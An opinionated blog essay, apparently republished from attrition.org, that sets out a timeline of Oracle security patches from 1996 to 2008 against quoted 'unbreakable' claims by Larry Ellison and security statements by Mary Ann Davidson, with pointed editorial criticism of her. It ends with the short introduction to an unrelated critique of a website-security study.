A Decade of Oracle Security

[This was originally published on attrition.org]

Oracle Corporation, one of the largest software companies in the world, has been providing database software for 30 years. What began as a U.S. intelligence agency funded relational database designed on a PDP-11 and never officially released, later turned into perhaps the largest and most prevalent commercial database used around the world. With global companies relying on Oracle databases for information management, the need for database security is critical. Despite that need, Oracle products have been plagued with all manners of security vulnerabilities that demonstrate Oracle products were not designed with security in mind. As new versions and new products are released, each is found vulnerable to critical issues that allow for trivial denial of service and complete database compromise.

The last decade of Oracle product security has been dismal. In the midst of CEO Larry Ellison’s promises that their database product was ‘unbreakable’ and CSO Mary Ann Davidson’s repeated claims that security is a core facet of their software lifecycle, security researchers continue to find critical remote vulnerabilities in a bulk of their products. The history provided here is to help make Oracle customers aware of just how little security really matters to Oracle Corporation.

It is past time for their customers to take the advice of Davidson and demand better from vendors. It is time for Oracle customers to demand the appointment of a Chief Security Officer that will stop the outright lies and spin-doctoring and turn their attention to the security of future products. Read the executive biography of Mary Ann Davidson and determine if she is living up to her job duties. “We are not just a really good commercial database but also a very secure commercial database.” — Mary Ann Davidson, 30th Anniversary soundbyte quote – 2007.16.04


1996, March

“On 22 Jun 1995, I reported a “flaw” with Oracle7 […] There have even been a few cases of the “system” password still being “manager” from the install.” — Anonymous [Source]

“It is general – and prudent – security practice not to publish details of security-relevant bugs, in order to protect exposed systems from potential attack. In his rush to expose `backdoors and bugs,’ The unidentified user has irresponsibly put other Oracle7 customers – who may not have had a chance to upgrade – at risk, while his systems are, of course, protected.” — Mary Ann Davidson [Source]

[Feb 02, Ellison claims no one has hacked an Oracle database in the last ten years. If true, why does MAD care about such responsible disclosure?]

2000, March – December

Oracle releases fixes for 9 security vulnerabilities. [March] [October] [November] [December]

2001, January – October

Oracle releases fixes for 20 security vulnerabilities. [January 1] [January 2] [January 3] [February] [April] [May 1] [May 2] [June 1] [June 2] [June 3] [July] [October 1] [October 2] [October 3] [October 4]

2001, November 13

Larry Ellison claims Oracle Database is “unbreakable”. [Source]

Chairman and CEO Larry Ellison positioned his company’s newest database product as the ultimate e-mail server during his keynote speech Monday night at Comdex and claimed that Oracle 9i is “unbreakable.” Emphasizing the importance of e-mail for enterprise customers, Ellison said Oracle’s database is fault-tolerant and that any application running on Oracle is therefore unbreakable. “The new version of the Oracle database is completely fault-tolerant,” Ellison said. “If the server fails, if the software fails, if the site fails, your application keeps running. It will not go down. You can’t break it.” Ellison also said hackers and cybercriminals can’t break into the database because of its enhanced security and stability. He said he was warned not to call Oracle 9i unbreakable because it would attract hackers eager to break into Oracle databases, but despite increased attacks recently, all attempts have failed so far, Ellison said.

2001, November 15

Mary Ann Davidson testifies before Congress on software security. Some quotes of interest: [Full Transcript]

“I’m Mary Ann Davidson. I’m the Director of Security Product Management for Oracle Corporation. Oracle is the second largest software company in the world, and we are a large provider of secure information management systems to both commercial and governmental customers. A number of our customers are involved in national defense or intelligence activities.”

“Organizations must assess their security requirements and not deviate from them as part of system design. If security is not built into a product or system from the get-go, it is often impossible to retrofit it after-the-fact. Organizations also need to look at the total cost of securing a system, including assessing the lifecycle cost of security, such as how often they will have to patch their systems due to significant security vulnerabilities. While no product is bug-free, an ostensibly secure product, for which a vendor is constantly issuing security patches, is a sign that the vendor did not pay enough attention to security during design, and at some level does not get it, or care about security. More importantly, often the single easiest way hackers break into systems is through public vulnerabilities for which the patch has not been applied. A vendor issuing a patch per day or every other day for their product suite is, in effect, building insecure and unsecurable systems.”

“Consumers of information technology have a requirement to make security a purchasing criteria. I’m sure you’re familiar with the expression that if you don’t vote, you lose the right to complain about the election afterwards. This is also true in security. If you do not make it a purchasing criteria, you lose the right to complain afterwards if you’ve been hacked.”

“Vendors, of course, also have many requirements to provide better cyber security. One of them is to commit to a secure product life cycle; that means everything from building security into your engineering process because you can’t add it after the fact, to being very aggressive in treating security vulnerabilities and notifying a customer base when there are problems in our product suites.”

Ms. Davidson: “Well, I think it’s important that security has to be part of a design process. And a vendor of a secure product has to make a commitment to a secure product lifecycle. For example, before you build a piece of software, you need to sit down and say what are the security threats I’m protecting against? What are the technical measures I’m going to implement?”

Ms. Davidson: “I don’t think you can ever be 100 percent sure and there is no bullet proof security. But it basically gets back to, I talk to my customers about the questions you ought to be asking all of your vendors about security. And that is, how do you build security? Is it part of the design process? Is that one of the first things you think of? Do you have secure coding practices? do you have a small group of people? Because it’s hard to get security right. You have a small group of people who are the experts to whom the rest of your company goes to make sure I’m building a piece of software, I need to make sure the security people; I talk to them, I use the code routines that are well formed and well delivered, I have testing to test the security mechanisms, I do security risk assessments or penetration tests, try to break into it.”

Ms. Davidson: “We have a team of reputable hackers whose very good that’s breaking into things before the product goes out the door.”

2001, November 29

Oracle releases fixes for 4 security vulnerabilities. [Source 1] [Source 2]

2001, December 11

Oracle releases fixes for 2 security vulnerabilities. [Source]

2001, December 14

Oracle releases fixes for 1 security vulnerability. [Source]

2001, December 28

Oracle releases fixes for 4 security vulnerabilities. [Source]

[What were you saying about “constantly issuing security patches and the vendor ‘just not getting it'”?]

2002, January 10

“Hackproofing Oracle Application Server” released by NextGen, disclosing multiple vulnerabilities and giving the first practical Oracle hardening guide. [Source]

2002, February 6

Oracle releases fixes for 20 security vulnerabilities. [Source 1] [Source 2]

2002, February 7

Mary Ann Davidson weakly defends Ellison’s comment about Oracle being “unbreakable”. [Source]

However, Oracle’s Chief Security Officer Mary Ann Davidson took exception with any characterisation that the company hasn’t delivered on its promise to create “unbreakable” software. “We are doing a heck of a lot,” she said. “I would much rather stand up and say we are going to make every product unbreakable than to say, ‘you’re right, it’s impossible,’ and give up.” “Marketing campaigns come and go,” said Oracle’s Davidson, “but we are in security for the long haul.”

[“Heck of a lot?” Flashbacks to Michael ‘Brownie’ Brown and we know where he ended up.]

2002, February 26

Larry Ellison says that Oracle Databases have not been hacked in the last 10 years. [Source]

LARRY ELLISON: Do you know how many people have hacked into an Oracle database in the last ten years?

SPENCER MICHELS: No.

LARRY ELLISON: That would be zero. That would be zero. It is not true that anyone can hack into any piece of software.

2002, March 5

Oracle releases fixes for 1 security vulnerability. [Source]

2002, March 5

Mary Ann Davidson writes a letter to The Register after Thomas Greene takes Oracle to task over vulnerabilities. In her letter she begins the process of modifying what “unbreakable” means and sets herself up for fun when Oracle later becomes hostile toward vulnerability researchers as well as makes the same mistakes over and over. [Source]

Our customers are among the most security-aware in the world; it is precisely because we market that we are secure that we take great pains to notify customers of security vulnerabilities when we – or others – find them. It’s very simple; you do the right thing by customers. We run our own systems on Oracle, so the security golden rule of ‘treating the customer as you would yourself’ is especially applicable.

It’s easy to criticize vendors for security vulnerabilities, but the target is all too easy to hit. A better approach might be to look at a vendor’s track record: we have spent millions on information assurance – having someone other than Oracle vet our security claims – through 14 independent security evaluations, far more than any other vendor. We have a secure product development process which we continuously strive to improve. Unlike many vendors, we do not blame the researcher for finding security issues in our products; rather, we give attribution to them, and make every effort to address the issue for all customers, on all releases, as quickly as possible, a feat particularly challenging for us given the number of product releases and operating systems we support. We use “vulnerability lessons learned” to continuously improve our development processes, our default installation and/or our documentation.

Our long-standing commitment to secure product design, development and delivery and independent measures of assurance is what ‘Unbreakable’ is all about. Long after the marketing campaign is done, we will still be fanatical about providing the most secure mission-critical software in the business.

2002, April

Oracle releases fixes for 4 security vulnerabilities. [Source 1] [Source 2] [Source 3]

2002, June 5

Oracle releases fixes for 2 security vulnerabilities. [Source 1] [Source 2]

2002, August

Oracle releases fixes for 7 security vulnerabilities. [Source 1] [Source 2] [Source 3] [Source 4]

2002, October

Oracle releases fixes for 8 security vulnerabilities. [Source 1] [Source 2] [Source 3] [Source 4] [Source 5] [Source 6]

2002, November 14

Ellison claims to have invited hackers from evil hacker-laden countries to test Oracle, and not a one could do it. He further takes more shots at Microsoft for poor security, all the while forgetting about the history of Oracle insecurity that is building. [Source]

Ellison claimed it’s been more than 10 years since someone has hacked into an Oracle database. Oracle invited the toughest hackers from China, Russia and all over the world to break into Oracle’s system when it launched its “Unbreakable” advertising campaign last year, he said. Though hacking attempts on Oracle’s Web site shot up to as many as 30,000 attacks per week during the campaign, no one managed to break into the system, Ellison said.

“Bill Gates said he would devote the month of February to security,” said Ellison, referring to an initiative at Microsoft earlier this year to improve the security of its software. “February’s a short month. We’ve devoted 25 years to security.”

2002, October 31

Oracle releases fixes for 1 security vulnerability. [Source]

2002, December

Oracle releases fixes for 4 security vulnerabilities. [Source 1] [Source 2]

2003, February 11

Oracle releases fixes for 6 security vulnerabilities. [Source 1] [Source 2] [Source 3] [Source 4] [Source 5]

2003, March 3

Oracle releases fixes for 1 security vulnerability. [Source]

2003, April

Oracle releases fixes for 2 security vulnerabilities. [Source 1] [Source 2]

2003, May 29

BusinessWeek writes a fancy story about Mary Ann Davidson and Oracle that seems to contradict other times in her life, when she specifically says that when she first heard the slogan “unbreakable”, she thought “What idiot dreamed this up?”. [Source]

Just so there’s no misunderstanding about who to look up should something go wrong, Davidson’s job starts with software development, where the task is to create a hacker-proof design, and ends with security response — containing the damage if any occurs.

Though Davidson didn’t have a programming background, she compensated with big-picture, strategic thinking. When Oracle’s marketing team and Ellison came up with the “unbreakable” slogan, she mobilized her staff to raise the security bar. That entailed closely examining many products and changing the way programming code was built and planned. Davidson often asks the thorny security questions that software developers prefer not to answer, such as: Who should get privileges to see data? How can a software product guarantee that only the right people get that access? And how should products be built to both preserve security and accommodate government demands to see information on an emergency or surveillance basis?

2003, July 23

Oracle releases fixes for 3 security vulnerabilities. [Source 1] [Source 2] [Source 3]

2003, August 18

Oracle releases fixes for 3 security vulnerabilities. [Source]

2003, September 10

Mary Ann Davidson, the chief security officer at Oracle Corporation, stands
behind Oracle’s commitment to develop the industry’s most secure database, application server and enterprise software products for its customers. Davidson, who has been at Oracle for more than 14 years, believes that security must be a design and development priority, not an afterthought, because “it’s impossible to bolt down security that is not built into the product.” She sees Oracle’s security ‘culture’ as a key corporate strategy and competitive advantage in the software industry. [Source]

2003, October

Oracle releases fixes for 3 security vulnerabilities. [Source 1] [Source 2]

2003, November 3

Oracle releases fixes for 1 security vulnerability. [Source]

2004, February 18

Oracle releases fixes for 2 security vulnerabilities. [Source 1] [Source 2]

2004, March 12

Oracle releases fixes for 2 security vulnerabilities. [Source]

2004, June 4

Oracle releases fixes for 1 security vulnerability. [Source]

2004, May 6

Mary Ann Davidson tells us about the cost of patching. Too bad she doesn’t carry it to the next step and give us the statistics for number of patches released by Oracle along with the number of customers or installations. [Source]

“For example, the estimated cost to deploy a patch for a recognized software flaw runs on average $900 per server and $700 per client. If an organization misses a patch and gets hit by a virus, the cost will be magnified.” — Mary Ann Davidson

2004, June 3

Oracle releases fixes for 2 security vulnerabilities. [Source]

2004, August 31

Oracle releases fixes for 35 security vulnerabilities. [Source]

2005, January 6

David Litchfield, responsible for finding dozens of vulnerabilities in Oracle products, finally gets tired of Oracle dragging their feet when producing patches. After Alert 68 is released to fix vulnerabilities, he discovers that many are incredibly pathetic attempts at fixes that can trivially be bypassed and offer no real solution to the problem or protection from attack. Litchfield posts to Bugtraq describing the patch problems and expressing his frustration that Oracle took eight months to produce such shoddy patches. His post is titled “Opinion: Complete failure of Oracle security response and utter neglect of their responsibility to their customers” [Source]

The real problem with this is not that the flaws Alert 68 supposedly fixed are still exploitable, but rather the approach Oracle took in attempting to fix these issues. One would expect that, given the length of time they took to deliver, these security “fixes” would be well considered and robust; fixes that actually resolve the security holes. The truth of the matter though is that this is not the case.

Some of Oracle’s “fixes” simply attempt to stop the example exploits I sent them for reprodcution purposes. In other words the actual flaw was not addressed and with a slight modification to the exploit it works again. This shows a slapdash approach with no real consideration for fixing the actual problem itself.

As an example of this, Alert 68 attempts to fix some security holes in some triggers; the flaws could allow a low privileged user to gain SYS privileges – in other words gain full control of the database server. The example exploit I sent to Oracle contained a space in it. Oracle’s fix was to ignore the user’s request if the input had a space. What Oracle somehow failed to see or grasp was that no space is needed in the exploit. This fix suggests no more than a few minutes of thought was given to the matter. Why did it take 8 months for this? Further, how on earth did this get through QA? More, why are we still waiting for a proper fix for this?

2005, January 18

Oracle releases fixes for 25 security vulnerabilities. [Source]

2005, January/February

Mary Ann Davidson begins the blame game, citing security researchers as a problem equal to that of vendors. She also reminds us that the U.S. intelligence agencies rely on Oracle software, continually reminding us that our intelligence program is housed on extremely vulnerable software. [Source]

“I admit: We vendors need to do better in building secure software. We try. I try everything I possibly can. But I don’t buy the argument that it’s all the vendors’ fault for not building better software, in cases where researchers happily hand weapons of mass disruption to the hacking community.”

“When you look at the amount of money spent fixing avoidable, preventable security faults, you realize that almost anything that can be done upfront to avoid making those mistakes pays for itself quickly. There is a strong cost-avoidance argument to building software right the first time.”

“Oracle has a rather strong culture of security, partly because we started as a company nearly thirty years ago by building the first commercial relational database, under contract to a U.S. intelligence agency.”

2005, January 18

Oracle moves to a quarterly critical patch update cycle, releasing security updates roughly every three months. [Source]

2005, April 24

Oracle releases fixes for 69 security vulnerabilities in their first quarterly patch. [Source]

2005, May 24

Mary Ann Davidson keeps reminding us that customers should press their vendors for secure software. Fortunately for Oracle, their customers clearly don’t follow her advice. [Source]

As chief security officer (CSO) at software vendor Oracle, Davidson is in charge of making sure that customers’ data stays safe. Even if you’re not one of Oracle’s customers, who include critical infrastructure providers in the government, financial services, and telecommunications sectors, it’s possible that some of your data is being stored in Oracle software.

IDGNS: What other advice do you have for customers on security?

Davidson: Push your vendor to tell you how they build their software and ask them if they train people on secure coding practices. Also, push industry analysts on which products are more secure. Analysts tend to not do direct product comparisons but I think they should do it on security products based on the total cost of ownership. For example, ask which product is going to cost more from a security standpoint, ask how many patches am I going to have to apply, and how many consultants am I going to have to hire to lock it down.

2005, July 12

Oracle releases fixes for 55 security vulnerabilities, 11 of which are silent fixes, showing that they are not entirely open about vulnerabilities. [Source]

2005, September 16

Problem with “one of 100 issues”? Read back to January and it seems to be more prevalent. [Source]

Speaking with eWEEK Magazine, Oracle CSO Mary Ann Davidson admitted that the company had a problem with one of 100 issues that it fixed in its most recent quarterly Critical Patch Update (CPU).

Davidson admitted that the company did not adequately check to make sure that the patch components were installed correctly on Oracle systems where the patch was applied.

2005, October 18

Oracle releases fixes for 90 security vulnerabilities. [Source]

2005, December 21

Pete Finnigan notices that Mary Ann Davidson announces (and thus endorses) Fortify software will be used to audit Oracle software for vulnerabilities. Below is Pete’s comments on how ineffective this will be. Three years later, the number of vulnerabilities doesn’t seem to be going down at all. This is the power of fluffy partnerships for the sake of it, not for any real value (to Oracle at least). [Source]

I saw today that Mary Ann Davidson has announced that Fortify Software Inc’s products will be used to check the database server software and middleware for potential security holes. I saw this is a post titled “Oracle Turns to Fortify to Secure Source Code”. In this post Mary Ann says she has searched for years for a suitable tool to audit the Oracle software. There is a sting in the tail though as Fortify’s software is not suitable for auditing large swathes of the Oracle product stack such as the application server, E-Business Suite, Peoplesoft and many more that are written in a variety of languages, presumably PL/SQL is one of these that are not supported. It sounds from this article that the C used for the server will be audited but PL/SQL not. As most of the recent SQL Injection issues and therefore security bugs are in PL/SQL packages this new tool is unlikely to make large inroads into the recent woes caused by these bugs.

2006, January 12

Not even a year later, Pete Finnigan is right. Fortify fails to find many vulnerabilities. Instead, they find a high rate of false positives and the inability to find what security researchers are finding. [Source]

Why Oracle changed its mind is a long story. But the straw that broke the camels back came in November. It came in the form of a report from security research Alexander Kornbrust, of Red-Database-Security GmbH, which stated that Kornbrust had found some 252 unpatched holes in Oracle Database 10g.

Oracle does have a lot of resources, but vetting 252 reported vulnerabilities isnt where its people want to devote them. As it is, the automated code assessment tools Oracle uses tend to turn up false positives, John Heimann, director of Oracles security program management, told eWEEK.

2006, January 17

Oracle releases fixes for 89 security vulnerabilities. [Source]

2006, April 19

Oracle releases fixes for 37 security vulnerabilities. [Source]

2006, April 27

Oops? Oracle forgot to patch a critical hole, leaving their customers vulnerable to public exploits. [Source]

Last week, the business software maker issued its quarterly Critical Patch Update, addressing more than 30 flaws in its software. However, the update for Oracle 10g Release 2 does not plug a hole that allows published attack code to run, according to a message sent to the Full Disclosure security list on Wednesday by David Litchfield, a researcher at Next Generation Security Software.

2006, May 1

Mary Ann Davidson claims that 75% of all security bugs are found by Oracle’s security team. Alexander Kornbrust decides to use Davidson’s math against her to show just how bad Oracle products really are. Remember, Mary Ann, all of those vulnerabilities supposedly found by your team are potential risks to your customers before they are found and fixed. [Source]

Last year, Oracle’s chief security officer Mary Ann Davidson claimed that Oracle’s own researchers found 75 percent of the bugs in the company’s products. Kornbrust used Davidson’s figure to project that Oracle actually had 160 flaws it needed to fix.

“Let’s do some math,” wrote Kornbrust on Bugtraq. “According to Mary Ann Davidson 75 % of all security bugs are found by Oracle employees: If bugs are fixed independently by the reporter then: 25 % = 40 unfixed bugs ( found by Red-Database-Security) 75 % = 120 unfixed bugs (found by Oracle employees) ==> 160 security bugs are still unfixed.”

2006, May 25

Mary Ann Davidson tells us about band-aids and how they are a waste of resources, yet year after year Oracle proves that is the only solution they have available. [Source]

“I don’t hate protecting our customers, that’s important, but what a waste of resources to try to band-aid after the fact something we should have caught earlier,” she said.

As a result, Oracle has implemented numerous measures to produce better code. Oracle created a 200-page guide on coding standards. An in-house hacking team pokes products for holes in live hacking sessions. Developers up to senior vice presidents must participate in educational Web-based classes.

“We use our own dumb-ass mistakes as examples,” Davidson said. “Because if you don’t do that, developers think this is an academic argument.”

The company uses new in-house tools to looks for buffer overflow vulnerabilities and SQL injection attacks. It also employs software from Fortify Software to scan for problems in Oracle’s 30 million lines of code, she said.

“My goal is to be out of a job,” Davidson said.

2006, May 29

Oracle’s security chief says the software industry is so riddled with buggy product makers that “you wouldn’t get on a plane built by software developers.” Personally, I wouldn’t get on an Oracle brand bicycle or use an Oracle brand toaster. [Source]

Chief security officer Mary Ann Davidson has hit out at an industry in which “most software people are not trained to think in terms of safety, security and reliability.” Instead, they are wedded to a culture of “patch, patch, patch,” at a cost to businesses of US$59 billion, she said.

2006, May 29

Mary Ann Davidson proves beyond doubt that she is a token figurehead at Oracle, put there for spin-control and little else. [Source]

There is often little upside to cooperating with companies that do not understand Oracle and who profit from publishing security vulnerabilities, according to Oracle Chief Security Officer Mary Ann Davidson.

“What I really want is a world where there can be fair and accurate criticisms,” she said. “I’m all for dialogue, but you have to establish trust.”

[As this timeline shows, there is little reason to trust Oracle products, Ellison or Davidson. They are clearly not interested in customer security.]

And Oracle no longer talks about its products as unbreakable. Earlier this week, Davidson said that the first time she heard the marketing slogan, she thought, “What idiot dreamed this up?”

Davidson believes that Oracle and Microsoft have very different pedigrees when it comes to security. She says that security has been built into the development of Oracle’s products for years now, a by-product of its long history of government use. The U.S. Central Intelligence Agency was one of Oracle’s first customers, she noted.

Oracle’s security team doesn’t simply fix bugs. When a new flaw is discovered, researchers make sure that what they’ve learned also translates into secure coding practices for the development team. “For at least 12 years we have built security into the formal development process,” Davidson said.

[Yes, this amazing security pedigree, secure coding practices and security development process are abundantly clear. When Davidson says all of this with a straight face, it demonstrates that her position is that of a liar, not someone genuinely interested in improving product security.]

2006, July 18

Oracle releases fixes for 65 security vulnerabilities. [Source]

2006, October 17

Oracle releases fixes for 101 security vulnerabilities. [Source]

2007, January/February

“This leads me to the very last reason but really the first reason why we did what we did for Oracle Database XE: Oracle’s name is on it, and security is part of everything we do.” — Mary Ann Davidson [Source]

2007, January 16

Oracle releases fixes for 51 security vulnerabilities. [Source]

2007, March/April

Mary Anne Davidson writes in Oracle Magazine citing an example of how Oracle customers asked for identity management solutions centered around a “really scalable LDAP directory”. Despite all of the lessons learned, security development life cycle and their own ethical hacking team, it didn’t take long for vulnerabilites to surface. Of course, any claims that the vulnerabilities were due to portions of the technology being acquired can be put to rest when we see that Oracle’s LDAP solutions had vulnerabilities as far back as July 2001. [Source]

“Oracle, for example, got into identity management when customers asked us to build a really scalable LDAP directory, and we have made several acquisitions in identity management for the purpose of offering a complete, integrated, and heterogeneous solution.” — Mary Ann Davidson

2007, April 17

Oracle releases fixes for 36 security vulnerabilities. [Source]

2007, May/June

Mary Ann Davidson writes about all the great work Oracle is doing with transparent data encryption and privilege separation, all the while using their search technology to find stuff. In essence, she is telling Oracle customers that they can use more Oracle products to make their lives easier. And less secure. [Source]

“One of our key database security product features is definitely Transparent Data Encryption, encryption that is just there and works, without requiring you to recode your application. (Encrypting data in an operational database transparently to an application is not all that easy, or we’d have done it a long time ago.) We can encrypt backups, too, by using Oracle Secure Backup, and given the amount of sensitive information stored off-site in backups, that’s a great thing. Just ask any company whose unencrypted backup tapes of all their customer data have gone missing. We have also started tackling that perennial “other hard security problem” of the godlike-privileged DBA by enabling customers to separate database administration from data access in the administered database by using Oracle Database Vault. And, last but not least, with Oracle Secure Enterprise Search we provide the ability to harness the power of all your data in disparate places across your enterprise through a powerful search engine, while limiting (in some cases, for security reasons) people from even knowing that a document exists. I confess that, for someone who works at a tech company, I am a closet Luddite, but database security is definitely cool again.

I’m glad that a lot of great folks at Oracle are making data security just that simple. I think our customers, and their customers, will be glad too.” — Mary Ann Davidson

2007, May 23

Mary Ann Davidson begins a new campaign of spin-control, trying to justify Oracle product insecurity by saying that since they used tools to try to find bugs during the software development lifecycle, they had good intentions and that makes it ok that someone compromised your entire database and published your customer information. Even then, using shoddy tools that clearly aren’t adequate for the task doesn’t mean they paid attention, it means they wasted huge portions of their security budget. [Source]

“Maybe you can’t prove that this product is free of defects but at least prove to me that you use these [tools] in its development. You are going to have to have some kind of proof that you paid attention in development — even to the level of training people and what kind of software lifecycle you have,” said Davidson.

2007, July 17

Oracle releases fixes for 45 security vulnerabilities. [Source]

2007, August 14

On her new blog, Mary Ann Davidson tries to convince us that many vendors, especially Oracle, have more secure products rolling out and that newer products are more secure because of the lessons they learned. Over the next year, new Oracle products are found to be vulnerable to the same classes of vulnerabilities that have plagued their products for 25 years. [Source]

“Where does this leave us? With a speed bump that says, in effect, newer versions of products — almost any vendor’s products — are probably, all other things being equal, “more secure.” This seems obvious, but it is worth stating. Vendors — most of us — know more about secure development and secure coding than we did even three or four years ago. Newer products reflect that. Also, even if we can’t fix every single security issue on old product versions, we certainly are going to fix it in new versions. Preferably, as soon as we can because it is just good business and common sense to do this.” — Mary Ann Davidson

2007, October 8

Oracle’s SSA program (new acronym, same spin) supposedly uses multiple tools to find and eliminate vulnerabilities before products ship. One has to wonder just how bug-ridden their software is if they are having success with these tools and researchers are still finding sometimes hundreds of vulnerabilities a quarter. [Source]

“The main value of automated vulnerability assessment tools is finding and fixing problems during development, before products ship. Also, automated vulnerability assessment tools are just one component of a robust, comprehensive assurance program. Oracle uses multiple tools as part of its Software Security Assurance program.” — Mary Ann Davdison

2007, September/October

[Source]

“Oracle is celebrating its 30th anniversary this year. Some of us old-timers have been busy wallowing in nostalgia by cataloging remembrances of how Oracle has changed over these 30 years.” — Mary Ann Davidson

[Some of us old-timers have been busy cataloging over 1,080 vulnerabilities in Oracle.]

“Oracle has some homegrown tools we use to help find and root out common secure-coding errors. Some of these have been developed by Oracle’s ethical hacking team, whose technical acumen is exceeded only by its sense of humor in naming the tools. (SQL*Splat is a tool for finding SQL injections, and Bit*Rotter is a protocol fuzzer.) The ethical hacking team uses these tools to automate its security assessments, and the quality assurance teams use them to keep ahead of the ethical hackers.

It took us a long time to find good tools, train people to use them, and roll them out. We have helped our vendors make their tools more robust (nobody could scan 50 million lines of code daily when we started looking at tools), which helps not only Oracle but also others in the industry.” — Mary Ann Davidson

[If the names SQL*Splat and Bit*Rotter are humorous as compares to their technical skills, it may explain why Oracle’s ethical hacking team misses so many vulnerabilities subsequently found by third-parties.]

2007, October 16

Oracle releases fixes for 51 security vulnerabilities. [Source]

2007, October 17

“I don’t know if it’s my Midwestern upbringing or going to a university with a very strong honor code, but I am really big on disclosure.

Disclosure forces you to be honest with yourself as well as other people. If you have an axe to grind about something, you need to disclose who sharpens your axe if it is material to the discussion. And it often is.” — Mary Ann Davidson [Source]

[“Disclosure.. honesty.. you keep using these words. I do not think they mean what you think they mean.”]

2007, November/December

One or two months after vulnerabilities were disclosed in Oracle Vault products, Mary Ann Davidson says they were released when ready for the market. [Source]

“What also strikes me about the Oracle Database 11g launch: the option and product releases before the launch. Oracle has released a number of innovative database security options, products, and features over the last two years, including Oracle Database Vault and Oracle Audit Vault. These two offerings were so important that Oracle did not wait for the Oracle Database 11g release; instead, Oracle shipped them when they were ready for market.” — Mary Ann Davidson

2008, January 15

Oracle releases fixes for 26 security vulnerabilities. [Source]

2008, January/February

Again, new technology touted by Oracle and almost immediately found vulnerable. [Source]

“Inside the enterprise, search engines need to be smart and choosy: they must help people find what they need, without allowing them to snoop for what they aren’t supposed to have. Oracle Secure Enterprise Search was built to be a “better mousetrap”: an intelligent, security-aware search engine.” — Mary Ann Davidson

2008, February 18

Mary Ann Davidson tells us of Oracle offering a class about defending against SQL injection attacks. Since a product can sanitize user-supplied input, the vendor is the best one to take this class. I guess with their track record, they have to rely on defense-in-depth more than anyone. Hopefully, every single programmer at Oracle is required to take this class. [Source]

“An important objective of Oracle Software Security Assurance is that we provide information to customers that helps enable them to use our products securely. To this end, we have developed training materials titled “Defending Against SQL Injection Attacks.” Available now, this training content is available online and can also be downloaded so that offline studying (while in the train for your morning commute) is possible. “Defending Against SQL Injection Attacks” highlights some of the coding practices required to eliminate SQL injection vulnerabilities when developing in an Oracle environment. Oracle recommends that anyone who develops Internet applications that access an Oracle database review these materials. Note that this tutorial will also be available through Oracle University as a lesson in the instructor-led course “Oracle Database 11g: Advanced PL/SQL”, which is scheduled to be available in April 2008.” — Mary Ann Davidson

2008, March 6

“Forthwith, here is my script for parsing through shill-meisters as quickly as possible:

5. “How can it be broken?” (Especially for a security product, knowing and being honest about how it can be broken is important. A claim of “zero false positives,” for example, should cause anyone to run screaming in the opposite direction.) (like ‘unbreakable’?)”

[Yes, exactly like “unbreakable”. Perhaps Oracle customers should heed your advice.]

“As much as I have expressed concerns about every idiot with an opinion being able to express it on the Internet (as I am doing here!), the fact remains that in some cases, bloggers have spotted untruths, exaggerations and fabrications reported by the media (doctored pictures and doctored service records, to think of a couple of prominent examples). There is an important utility in keeping professional journalists and industry analysts honest and objective that is worth something to the millions of people who expect that from mainstream media. Score one for the blogosphere.

I talked in my presentation about what constitutes a good metric (objective, measurable, helps you answer basic questions like “are we doing better or worse,” incents the right behavior, fosters additional questions, helps you identify positive or negative trends, and so on). I used as an example the various metrics we keep pertaining to the release of CPUs that I wanted to discuss as a group, because there is no single metric that you could use to answer “goodness questions” related to how we are doing. In fact, picking a single metric and focusing it to the absence of all others would lead to incorrect incentives.” — Mary Ann Davidson [Source]

[Primarily because none of the metrics suggest Oracle is doing better.]

2008, April 4

Davidson is “keenly aware” of the costs to Oracle customers, yet history shows she has done little to prevent it. [Source]

“As such, I am keenly aware of the high costs to Oracle and to our customers of avoidable, preventable defects in our software.” — Mary Ann Davidson

2008, April 8

Mary Ann Davidson blogs about the growing problem of hiring qualified programmers that have been trained to code with security in mind. This begins a new trend of blame-shifting, suggesting that universities are to blame for vulnerabilities, as they do not properly teach computer science students. [Source]

“In the vendor community, there is a low rumble of discontent about our supply chain’s current lack of a “secure development lifecycle.” I’m not talking about other software suppliers (for example, vendors who supply toolkits or components we embed) though at Oracle, we do vet these suppliers’ security practices before we incorporate their technologies into our code.

While I appreciate the University of X’s CS department chairman getting back to me (and the fact that they had at least some material on secure coding practice), I see no reason to pay them to do work they should be doing, anyway.

Take my letter, modify it as you will, and start holding university CS programs’ feet to the fire to improve.” — Mary Ann Davidson

2008, April 15

Oracle releases fixes for 41 security vulnerabilities. [Source]

2008, May

As of May 2008, there is no real statistical evidence to show that Oracle security is improving. Despite the continued promises from Davidson and Oracle, security standards, security development life cycle, learning from past mistakes and other sound bytes are doing nothing to produce secure products.

2008, May/June

Using standard modules in software can be beneficial. The programmers who wrote those modules weren’t properly trained on secure coding practices however, which results in a mess. Worse, watching Mary Ann Davidson parrot the maxim of “don’t trust client input” is laughable given the sheer number of cross-site scripting and SQL injection vulnerabilities that plague Oracle products. [Source]

“For example, for many years, Oracle has had its developers use standard cryptographic modules.” — Mary Ann Davidson

Oracle believes that most developers should be writing “Secure code,” not “security code.”

A second caution is to remember information security Rule No. 1: “Don’t trust any information from the client.”

2008, July/August

Mary Ann Davidson says Oracle has always been a security leader. I’m not sure by what definition though. She says Oracle has developed “security-enforcing interfaces, such as input validation”, yet every quarter we see a new set of input validation related vulnerabilities. [Source]

“In the almost 20 years I have spent here, I have seen Oracle evolve from being a strong database company to one of the largest enterprise software companies in the world. We have always been security leaders, and not merely in security features and functions. We lead by broadly training our developers in secure coding practice. We lead by wide deployment of automated vulnerability detection tools (both third-party and homegrown). We’ve developed security-enforcing interfaces, such as input validation, without expecting every developer (or customer) to be a security expert.” — Mary Ann Davidson

2008, July 16

Oracle releases fixes for 45 security vulnerabilities. [Source]


The role of Chief Security Officer (CSO) is one of taking responsibility for the security of an organization or the products it sells. A CSO must demand quality from employees, provide continual training and ensure employees continually improve processes to better integrate security into the product lifecycle. When a CSO becomes a mouthpiece for a company and is more interested in spin-control, shirking responsibility and towing the company line, it is time for the company and its customers to evaluate the ethics of such a person and the need for such a position. Mary Ann Davidson is a professional spin-doctor and cannot be taken seriously as a CSO after the last ten years of her career.

Brief analysis of “Analyzing Websites for User-Visible Security Design Flaws”

[This was originally published on attrition.org]

On July 23, 2008, an article was released touting the numbers of a recent study on website security design flaws. The article only quoted some statistics from the research and did not link to it or go into detail on how the statistics were derived. I posted a quick rebuttal to the Dataloss mail list calling the entire study into question. Without the full details, the statistics really have no relevant meaning.

Shortly after the post, I was provided with a copy of the original research and was able to give a more thorough analysis of the paper. It is reproduced below, only altered for better formatting.


